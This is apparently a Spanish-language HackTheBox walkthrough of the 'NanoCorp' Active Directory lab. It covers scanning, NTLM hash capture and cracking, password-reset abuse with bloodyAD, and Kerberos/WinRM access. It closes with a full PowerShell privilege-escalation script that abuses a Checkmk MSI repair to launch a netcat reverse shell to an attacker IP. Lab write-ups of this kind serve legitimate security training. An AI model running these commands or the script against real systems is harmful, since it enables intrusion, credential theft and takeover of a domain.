HackTheBox NanoCorp

nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.93 -oG port

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
80/tcp   open  http             syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127
5986/tcp open  wsmans           syn-ack ttl 127

Buscamos los puertos abiertoos que tiene el host.

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5986 10.10.11.93 -oN target.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-12 15:33 EST
Nmap scan report for nanocorp.htb (10.10.11.93)
Host is up (0.10s latency).

PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Nanocorp
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-12-12 20:37:18Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
5986/tcp open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after:  2026-04-06T23:18:43
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-12T20:37:37
|_  start_date: N/A
|_clock-skew: 3m51s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.07 seconds

El escaneo muestra que 10.10.11.93 es un controlador de dominio Windows (DC01) del dominio nanocorp.htb, con servicios clave de Active Directory expuestos: Kerberos (88), LDAP/LDAPS (389/636/3268/3269), SMB (445/139/135) y RPC.
También corre un servidor web Apache en el puerto 80, con PHP 8.2.12 y el método TRACE habilitado.
El puerto 5986 muestra un servicio WinRM sobre HTTPS y el certificado SSL confirma el nombre del DC. En general, el host es claramente un Domain Controller con servicios típicos de AD abiertos, lo cual indica su rol central en la red.

curl -s http://nanocorp.htb/ | grep '.htb'
                                                        <a href="http://hire.nanocorp.htb" class="btn tm-btn-gray">Apply Now</a>        
                <p class="small tm-copyright-text">Copyright &copy; <span class="tm-current-year">2025</span> nanocorp.htb </a></p>

Inspeccionando el codigo fuente encontramos un nuevo dominio lo agregamos a nuestros /etc/host http://hire.nanocorp.htb.

Observamos las web's los dos dominios. La segunda interfas investigando encontre esta vulnerabilidad.

Windows File Explorer Windows 11 (23H2) - NTLM Hash DisclosureExploit Database

Hemos generado este arcchivo ahora lo vamos a subir a la web.

Observamos que subimos con exito el archivo zip.

Cuando nos ponemos en escucha con el sudo responder -I tun0 observamos que logramos capturar el hash del usuario que ejecuta ese servicio.

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dksehdgh712!@#   (web_svc)     
1g 0:00:00:00 DONE (2025-12-12 18:00) 1.369g/s 2541Kp/s 2541Kc/s 2541KC/s doglover94..djcward
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Haciendo uso de john logramos crackear el hash.

ldapdomaindump

ldapdomaindump  -u 'nanocorp.htb\web_svc' -p 'dksehdgh712!@#' 10.10.11.93 -o dump
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Numero uno nos hemos hecho con la contraseña de web_svc
Como punto numero dos observamos que el unico usuario que se puede conectar remotamente es monitoring_svc del cual no tenemos nada.

Bloodhound-python

El comando bloodhound-python se ejecutó correctamente usando las credenciales del usuario web_svc, obtuvo un TGT válido, se conectó al controlador de dominio dc01.nanocorp.htb y enumeró toda la información principal del entorno Active Directory del dominio nanocorp.htb, incluyendo 1 dominio, 1 equipo (el DC), 6 usuarios, 53 grupos, 2 GPOs, 2 OUs y 19 contenedores, sin encontrar relaciones de confianza entre dominios. Finalmente generó un archivo comprimido BloodHound.zip con todos los datos recolectados para su análisis.

Ahora vamos a analizar esta informacion generada de una manera mas estructurada y visual usando BloodHound.

Tenemos control total sobre las credenciales del usuario web_svc, y gracias a eso podemos añadirnos al grupo IT_Support. Este grupo, a su vez, posee el privilegio de Forzar Cambio de Contraseña sobre la cuenta monitoring_svc, lo que nos permite establecer una nueva contraseña a nuestra elección.
Obtener el control de monitoring_svc es clave, ya que con sus privilegios podremos autenticarnos directamente contra el Domain Controller y avanzar en la escalada dentro del dominio.

❯ bloodyAD --host 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' add groupMember 'IT_SUPPORT' 'web_svc'
[+] web_svc added to IT_SUPPORT


❯ bloodyAD --host 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' set password 'MONITORING_SVC' 'rodg@r123'
[+] Password changed successfully!

Usando las credenciales de web_svc, primero me añadí al grupo IT_SUPPORT, y como ese grupo tiene permisos para forzar cambios de contraseña, aproveché para resetear la contraseña de monitoring_svc y poner una nueva. Con esto ya tengo control total de esa cuenta y puedo usarla para acceder con más privilegios dentro del dominio.

impacket-getTGT 'nanocorp.htb/MONITORING_SVC:rodg@r123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in MONITORING_SVC.ccache
❯ export KRB5CCNAME=MONITORING_SVC.ccache

Usé impacket-getTGT para generar un TGT con las credenciales de MONITORING_SVC, y el ticket se guardó en el archivo MONITORING_SVC.ccache. Después exporté KRB5CCNAME para que mi sesión use automáticamente ese ticket. Básicamente, ya tengo cargada la identidad de monitoring_svc y puedo autenticarme en el dominio sin volver a poner la contraseña.

Recordemos el puerto 5986 funciona con WinRM sobre HTTPS, así que para conectarme tengo que manejar la autenticación Kerberos o Cert basada en HTTPS. No puedo entrar directamente como si fuera HTTP normal; necesito usar el ticket Kerberos que ya generé o una autenticación compatible con WinRM sobre TLS para poder acceder sin problemas.

https://raw.githubusercontent.com/ozelis/winrmexec/main/winrmexec.pyraw.githubusercontent.com

Esto nos ayudara con nuestra mision.

Ejecuté winrmexec.py usando el ticket Kerberos de MONITORING_SVC (-k) para conectarme al puerto 5986 de WinRM sobre HTTPS. La herramienta automáticamente resolvió la IP y la URL del servicio, solicitó un TGS para HTTP/dc01.nanocorp.htb y me abrió una sesión de PowerShell en el DC como monitoring_svc, lista para ejecutar comandos con los privilegios de esa cuenta.

Antes que nada para escalar privilegios nos creamos el siguiente script.

param(

    [int]$MinPID = 1000,

    [int]$MaxPID = 15000,

    [string]$LHOST = "10.10.15.130",

    [string]$LPORT = "7001"

)

# 1. Define the malicious batch payload

$NcPath = "C:\Windows\Temp\nc.exe"

$BatchPayload = "@echo off`r`n$NcPath -e cmd.exe $LHOST $LPORT"

# 2. Find the MSI trigger

$msi = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProper>

        Where-Object { $_.DisplayName -like '*mk*' } |

        Select-Object -First 1).LocalPackage

if (!$msi) {

    Write-Error "Could not find Checkmk MSI"

    return

}

Write-Host "[*] Found MSI at $msi"

# 3. Spray the Read-Only files

Write-Host "[*] Seeding $MinPID to $MaxPID..."

foreach ($ctr in 0..1) {

    for ($num = $MinPID; $num -le $MaxPID; $num++) {

        $filePath = "C:\Windows\Temp\cmk_all_$($num)_$($ctr).cmd"

        try {

            [System.IO.File]::WriteAllText($filePath, $BatchPayload, [System.Text.Encoding]::ASCII)

            Set-ItemProperty -Path $filePath -Name IsReadOnly -Value $true -ErrorAction SilentlyContinue

        } catch {

            # 123

        }

    }

}

Write-Host "[*] Seeding complete."

# 4. Launch the trigger

Write-Host "[*] Triggering MSI repair..."

Start-Process "msiexec.exe" -ArgumentList "/fa `"$msi`" /qn /l*vx C:\Windows\Temp\cmk_repair.log" -Wait

Write-Host "[*] Trigger sent. Check listener."

Ahora vamos ah transferir los componentes necesarios para que todo esto funcione el runas y el nc.exe cp /usr/share/windows-resources/binaries/nc.exe /home/kali/Desktop/HackThebox/NanoCorp/scripts

❯ ls -l

.rw-rw-r-- kali kali 1.2 KB Tue Dec 23 17:18:02 2025  bad.ps1
.rw-rw-r-- kali kali 1.4 KB Tue Dec 23 16:47:36 2025  MONITORING_SVC.ccache
.rwxr-xr-x kali kali  58 KB Sun Dec 21 20:49:22 2025  nc.exe
.rw-rw-r-- kali kali  93 KB Sun Dec 21 20:50:20 2025  RunasCs.cs

Estos tres archivos el bad el nc y el runas nos lo vamos a transferir a la maquina victima.

RunasCs/RunasCs.cs at master · antonioCoco/RunasCsGitHub

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs

El compilador se inició y generó RunasCs.exe, aunque mostró una advertencia que indicaba que el compilador integrado solo admite funciones hasta C# 5. A pesar del mensaje de versión desactualizada, la compilación se completó sin errores, lo que significó que ahora tenía un binario funcional listo para intentar la escalada de privilegios.

Una vez tenemos todo ejecutamos todo y maquina resuelta.

AnteriorHackTheBox Fries SiguienteMedium

Última actualización hace 3 meses

hashtagldapdomaindump

hashtagBloodhound-python

ldapdomaindump

Bloodhound-python